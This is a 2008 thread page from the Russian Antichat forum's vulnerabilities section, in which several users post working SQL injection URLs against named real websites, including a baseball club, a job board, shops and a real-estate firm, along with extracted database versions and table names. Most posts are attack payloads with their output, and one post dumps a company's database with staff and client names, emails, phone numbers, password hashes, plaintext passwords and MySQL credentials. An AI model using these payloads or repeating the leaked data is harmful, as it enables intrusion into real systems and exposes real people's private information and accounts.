ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5551  
Старый 27.05.2008, 10:24
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

Цитата:
Сообщение от Momiji  
nevadabighornbaseball.com
Код:
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3,version(),user(),database()),0x71),0x71)/*
5.0.45-lognevadabighorn@68.178.254.123nevadabighorn
Код:
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3,(SELECT+CONCAT(username,0x3,password,0x3,email)+FROM+nevadabighorn.pages_t_users+LIMIT+1,1)),0x71),0x71)/*
nevadabighornHumbaby543webmaster@nevadabighornba seball.com
Momiji, извини за совет но ты ошибся кое где))
может тебе это нравится, но лучше использовать вместо:
0x3
0x3a
 
Ответить с цитированием

  #5552  
Старый 27.05.2008, 10:57
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

PHP код:
http://www.rdu.org.ua/news.php?content=-1+union+select+1,header,null,id+from+news/* 
www.rdu.org.ua
 
Ответить с цитированием

  #5553  
Старый 27.05.2008, 16:22
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию

odnoklassniki.ru

[color=grey]Blind SQL[color]
PHP код:
http://rabota.odnoklassniki.ru/content/vacancies/search.html?region=2&s=33&payment_to=300&limit=10+--+&payment_from
http://rabota.odnoklassniki.ru/content/vacancies/search.html?s=19&company_type=agency%27&limit=5+--+ 

Отображение Flash баннера вверху.
 
Ответить с цитированием

  #5554  
Старый 27.05.2008, 17:26
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 КВР
Может я не вкуриваю что-то,не мог бы ты объяснить, что это?
И зачем это развешивать по всему форуму?
_https://forum.antichat.ru/showpost.php?p=705692&postcount=2093
_http://forum.antichat.ru/thread71552.html
 
Ответить с цитированием

  #5555  
Старый 27.05.2008, 17:45
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

PHP код:
http://www.funnymoneyreport.com/news.php?id=-1+union+select+id,2,date,4,5,6+from+news/* 
www.funnymoneyreport.com
 
Ответить с цитированием

  #5556  
Старый 27.05.2008, 18:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.skaterockshop.cz/index.php?feMenu=product&grSelected=&prodSelected=-12+UNION+SELECT+1,2,3,4,5,A ES_DECRYPT(AES_ENCRYPT(C ONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2 A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A6 56E64),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29/*


Version: 5.0.45-Debian_1ubuntu3-log
Database: bikepark
User: bikepark@localhost

http://www.skaterockshop.cz/admin.php

table_name=mystic_users
columns in this table : Name
Username
Password

ЗЫ.Grey извини, но больше не буду выкладывать на обозрение всех киндерофф...а знающему я думаю это более чем достаточно.
 
Ответить с цитированием

  #5557  
Старый 27.05.2008, 22:18
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

http://www.masterkit.ru/info/linkgroup.php?num=-1+union+select+concat_ws(0x3a,version(),database() ,user())--

4.0.27:masterkit:mk-base@localhost
 
Ответить с цитированием

  #5558  
Старый 28.05.2008, 04:14
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

http://www.9955599.ru/jobsect.php?section=-23+union+select+1,concat_ws(0x3a,version(),user(), database())/*
4.1.22:telgaz_mysql@212.193.227.34:telgaz_db
собственно скуль есть... просто с таблицами заморачиваться впадлу было=)
 
Ответить с цитированием

  #5559  
Старый 29.05.2008, 00:25
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Компания "Чёрный лес"

Цитата:
http://www.blackwood.ru/main.php?id=537'
http://www.blackwood.ru/main.php?id=537+AND+1%3Cascii(substring(VERSION(), 2,1))
VERSION(): 5.0.37-log

Названия таблиц
Код HTML:
	an_format	
	an_mag	
	an_news	
	an_qpstate
	an_quest	
	an_qwstate	
	an_speaker	
	an_staff	
	an_users	
	ap	
	ap_adm_raions	
	ap_fields	
	ap_house_types	
	ap_metro
	ap_opts	
	apt_adm_raions	
	apt_ap	
	apt_apimg	
	apt_cot_roads	
	apt_cot_sectors	
	apt_ns_bld	
	apt_schools	
	apt_web_titles	
	art_blocks	
	articles	
	blackwood_en_content	
	blackwood_en_content_analit	
	blackwood_en_content_analit_file	
	blackwood_en_content_cat	
	blackwood_en_content_corp	
	blackwood_en_content_first	
	blackwood_en_content_key	
	blackwood_en_content_key_dop	
	blackwood_en_content_main
	blackwood_en_content_news	
	blackwood_en_content_press	
	blackwood_en_content_razdel	
	blackwood_en_content_riel	
	blackwood_en_content_ruk	
	blackwood_en_content_text	
	blackwood_en_content_zar	
	blackwood_en_images	
	blackwood_en_select	
	blackwood_en_select_detail	
	blackwood_en_template	
	blackwood_en_template_details	
	blackwood_en_users	
	blackwood_en_vote	
	blackwood_en_vote_details	
	blackwood_fr_content	
	blackwood_fr_content_analit	
	blackwood_fr_content_analit_file	
	blackwood_fr_content_cat	
	blackwood_fr_content_corp
	blackwood_fr_content_first		
	blackwood_fr_content_key		
	blackwood_fr_content_key_dop		
	blackwood_fr_content_main		
	blackwood_fr_content_news		
	blackwood_fr_content_press	
	blackwood_fr_content_razdel	
	blackwood_fr_content_riel	
	blackwood_fr_content_ruk	
	blackwood_fr_content_text	
	blackwood_fr_content_zar	
	blackwood_fr_images	
	blackwood_fr_select	
	blackwood_fr_select_detail	
	blackwood_fr_template	
	blackwood_fr_template_details	
	blackwood_fr_users	
	blackwood_fr_vote	
	blackwood_fr_vote_details	
	blackwood_ru_content	
	blackwood_ru_content_analit	
	blackwood_ru_content_analit_file	
	blackwood_ru_content_cat	
	blackwood_ru_content_corp	
	blackwood_ru_content_first	
	blackwood_ru_content_key	
	blackwood_ru_content_key_dop	
	blackwood_ru_content_main	
	blackwood_ru_content_news	
	blackwood_ru_content_press	
	blackwood_ru_content_razdel	
	blackwood_ru_content_riel	
	blackwood_ru_content_ruk	
	blackwood_ru_content_text	
	blackwood_ru_content_zar	
	blackwood_ru_images	
	blackwood_ru_select	
	blackwood_ru_select_detail	
	blackwood_ru_template	
	blackwood_ru_template_details	
	blackwood_ru_users	
	blackwood_ru_vote	
	blackwood_ru_vote_details	
	blackwood_so_content	
	blackwood_so_content_analit	
	blackwood_so_content_analit_file	
	blackwood_so_content_cat	
	blackwood_so_content_corp	
	blackwood_so_content_first	
	blackwood_so_content_key	
	blackwood_so_content_key_dop	
	blackwood_so_content_main	
	blackwood_so_content_news	
	blackwood_so_content_press	
	blackwood_so_content_razdel	
	blackwood_so_content_riel	
	blackwood_so_content_ruk	
	blackwood_so_content_text	
	blackwood_so_content_zar	
	blackwood_so_images
	blackwood_so_select	
	blackwood_so_select_detail	
	blackwood_so_template	
	blackwood_so_template_details	
	blackwood_so_users	
	blackwood_so_vote	
	blackwood_so_vote_details	
	bpr_attr	
	bpr_attr_cat	
	bpr_attr_hse	
	bpr_attr_hse_cat	
	bpr_directs	
	bpr_land	
	bpr_lists	
	bpr_lists_cat	
	bpr_lnd_pics	
	bpr_raions	
	bpr_sectors	
	bpr_streets	
	bpr_templ_fields
	bpr_towns	
	clients	
	holiday	
	jelto_links	
	jelto_mail	
	jelto_mail_en	
	job	
	news	
	ofs_bld_pics	
	ofs_buildings	
	ofs_mtr_rad	
	ofs_mtr_sec	
	ofs_off_pics	
	ofs_offices	
	ofs_ofs_targets	
	ofs_ofs_types	
	ofs_web_titles	
	sch_class	
	sch_deal	
	sch_objects
	sch_pics	
	sch_raions	
	sch_types	
	sch_users	
	sub_report	
	users	
	vacancy	
	vap	
	vs_area	
	vs_metro	
	vs_mtr_line	
	vs_offers	
	vs_query	
	vs_sent	
	vs_street

Названия колонок + содержимое
Код HTML:
**************************************************
	users	(5 записей)
--------------------------------------------------
	usr_name	
	usr_passw	
	usr_status	
	usr_obj_id


	hr, pr869, 2, 0
	ib, suvorov99, 1, 0
	maxim, hr384, 3, 0
	pr, ib632, 4, 0
	sub, sub235, 5, 0
**************************************************
	an_staff	(17 записей)
--------------------------------------------------
	asf_name	
	asf_adname

	Широкова Ольга, shirokova
	Соколова Анна, sokolova
	Голубков Максим, golubkov
	Мамохина Александра, mamokhina
	Манн Вероника, mann
	Степаненко Алексей, stepanenko
	Домченкова Елена, domchenkova
	Шлеленко Нина, shlelenko
	Симонова Екатерина, simonova
	Карпова Ольга, karpova
	Петрачкова Галина, petrachkova
	Гулин Антон, gulin
	Щаденко Нина, schadenko
	Лобанова Анастаси, lobanova
	Данченок Анна, danchenok
	Оагнезова Наталь, oganezova
	Фирскина Елена, firskina
**************************************************
	an_users	(1 запись; modus, Mod6382, 2, 0)
--------------------------------------------------
	usr_name	
	usr_passw	
	usr_status	
	usr_obj_id
**************************************************
	an_speaker	(2 записи)
-------------------------------------------------
	asp_name	
	asp_adname


	Гец Михаил, gets	
	Литинецка, marsha
**************************************************
	an_quest	(3 записи)
--------------------------------------------------
	aqs_date	
	aqs_amg_id	
	aqs_title	
	aqs_ldate	
	aqs_ast_id	
	aqs_pdate	
	aqs_asp_id	
	aqs_asf_ids	
	aqs_text	
	aqs_afm_id	
	aqs_fpdate	
	aqs_lpdate	
	aqs_note	
	aqs_jorname	
	aqs_ansdate	
	aqs_state	
	aqs_modif	
	aqs_lhour
*************************************************
	ap_adm_raions
-------------------------------------------------
	arn_title_rs	
	arn_title_en
*************************************************
	blackwood_en_users	(1 запись; user, user, admin)
-------------------------------------------------
	name	
	pass	
	type	
	razdel	
*************************************************
	blackwood_ru_users	(1 запись; user, user, admin)
-------------------------------------------------
	name	
	pass	
	type	
	razdel
*************************************************
	clients	(20 записей)
-------------------------------------------------
	cln_name1	
	cln_name2	
	cln_name3	
	cln_email	
	cln_login	
	cln_password	
	cln_company	
	cln_tel	
	cln_text



	Ковалев, Константин, Николаевич, kovalev@blackwood.ru, 179, 7907143228d532cf, , 9154000,
	Фадеева, Марина, Викторовна, marina@blackw.dol.ru, aniram, 0e08af0332b7c218, , 730-20-00,
	Света, Света, Света, ritter@blackwood.ru, aspirant, 523905757f41e147, , 9154000,
	Уль, Уль, Уль, uliana@blackwood.ru, booky, 01836fac1c7fed0d, , 995-5961,
	Кулешов, Владимир, Викторович, vlad_victor@yahoo.com, bukalov, 39a9a3b45284239e, , 7648677,
	Мажаров, Андрей, Михайлович, mazharov@terra-estate.ru, dd,2b9ffe69078a5dce, Терра, 1300264,
	Романычева, Дарь, Владимировна, dasha@blackwood.ru, gimenei, 790ee65c6131c7c3, , 730-8559,
	Букалов, Иван, Александрович, booky@mail.ru, guta, 65fed1071d8978a9, BlackWood, 7892638,
	Букалов, Иван, Александрович, i.bukalov@mail.ru, knk, 500c3d5f2544c07e, BlackWood, 7892638,
	Coppen, Stephen, Jonathan, steve@imptv.co.uk, lambina, 3e83a47e6998d0e7, 7259927,
	Дерев, Андрей, Наумович, pahomich@pisem.net, lubimaya, 593a99e43d7b86ed, voxtel, 9670009,
	Черн, Михаил, Романович, mrc@mosgorzdrav.ru, lvb1983, 6df3cfc945ad3f59, 89161342798,
	Peeter, Põld, Mr, jannojarv@hot.ee, maikl166, 1d47ea711487945b, 5454545455,
	Иванов, Иван, Иванович, usergei980@mail.ru, manager, 71827725083cfad3, 1342594,
	asdf, asdf, sadf, jannojarv@gmail.com, pahomich, 17bf5dcb34024c24, 4523452345,
	Мун, Вадим, В, moonvv@mail.ru, scoppen, *00E71180F7BD38237D72E772FBC6B, 12 мес, 775-2222,(1005),
	Дорохин, Евгений, Аркадьевич, edorokhin@mail.ru, soslan, *55BC6A91C37ED36E6AD62A1594C4F, РЭМ Сервис, 514 51 01,
	Гурь, Тать, Валентиновна, guta555@mail.ru, temurid, *39C9A5F1471124BB97D421F08C7F4, 4344151,
	Самойлов, Тимур, Нодарович, temurid@pochta.ru, uliana, *50C7523E12C0429CCC22A6D0FB6CD, ООО "Глес, 1062147,
	б, л, в, lvb1983@yandex.ru, Vlad, *88AD09B53A37B9B6DC97B76E78717, эр, 89092359560,
**************************************************
	jelto_mail	(596 записей)
--------------------------------------------------
	mail	
	name	
	company	
	news	
**************************************************
	jelto_links
--------------------------------------------------
	title	
	text
**************************************************
	sch_users	(2 записи)
--------------------------------------------------
	usr_name	
	usr_passw	
	usr_status	
	usr_obj_id

	sochi, Sch3529, 3, 0	
	sochi28, Fltu3864, 2, 0
**************************************************
Результат

$mysql_host="localhost";
$mysql_user="blackw";
$mysql_password="black863";
$mysql_database="blackw";


Кто не дурак - админки сам найдёт

*******
 
Ответить с цитированием

  #5560  
Старый 29.05.2008, 02:26
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Cybernooky.com - sex shop
Цитата:
http://www.cybernooky.com/adult-toys/details.php?id='+union+select+1/*
Asextoyshop.com - sex shop

Цитата:
http://www.asextoyshop.com/search.php?k='

Последний раз редактировалось sabe; 29.05.2008 в 05:12..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ